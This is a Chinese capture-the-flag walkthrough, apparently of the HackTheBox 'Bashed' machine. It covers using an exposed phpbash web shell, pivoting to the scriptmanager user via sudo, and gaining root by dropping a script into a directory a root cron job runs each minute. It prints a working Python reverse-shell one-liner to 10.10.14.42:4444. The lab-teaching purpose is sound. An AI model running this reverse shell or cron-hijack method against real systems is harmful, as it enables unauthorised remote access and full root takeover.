信息收集
phpbash 顾名思义应该是能在php上远程执行bash
扫描目录后
尝试阶段
根据收集到的信息能在/dev找到描述的phpbash
能在/home/arrexel找到user.txt
提权阶段
操作不怎么方便还是反弹到本地好操作点。
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.42",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
先看看当前用户能用sudo执行些什么命令
这个scriptmanager有什么用呢,可以在根目录找到一个scripts文件,看上去有东西。
因为有一个scriptmanager可以使用,前面可以知道/home里面有一个scriptmanager用户,所以可以考虑用scriptmannager创建一个bash。
现在能进去scripts目录看看了。
有一个py和txt文件,但是txt文件的时间是上一分钟修改过,再次等了一分钟后发现修改时间又变了。
因为test.txt是root用户的文件,scriptmanager无权干涉,但是它却在以一分钟为间隔在修改,难道是test.py在修改么。
看来应该是test.py在修改test.txt,但是test.py是scriptmanager的产物,应该没权修改root文件。可能是root用户有一个周期任务,周期来执行test.py,也有可能是定时执行scripts这个文件里面的所有脚本
应该是周期执行scripts里面所有的脚本,这就好办了,直接上传个反弹shell,然后等一分钟以root权限执行。
有了root权限后,去看看是不是scripts会按周期执行目录内的脚本。
能看到五个星号,他们有什么含义呢
| 项目(从左往右) | 含义 |
|---|---|
| 第一个星号 | 分钟 |
| 第二个星号 | 小时 |
| 第三个星号 | 天 |
| 第四个星号 | 月 |
| 第五个星号 | 星期 |
此处遇到的星号是特殊符号之一表示任意时间,五个星号就是任意的分钟小时天星期月份,就是每分钟一次,一次什么内容呢。先cd到scripts目录然后执行里面的所有.py结束的python程序。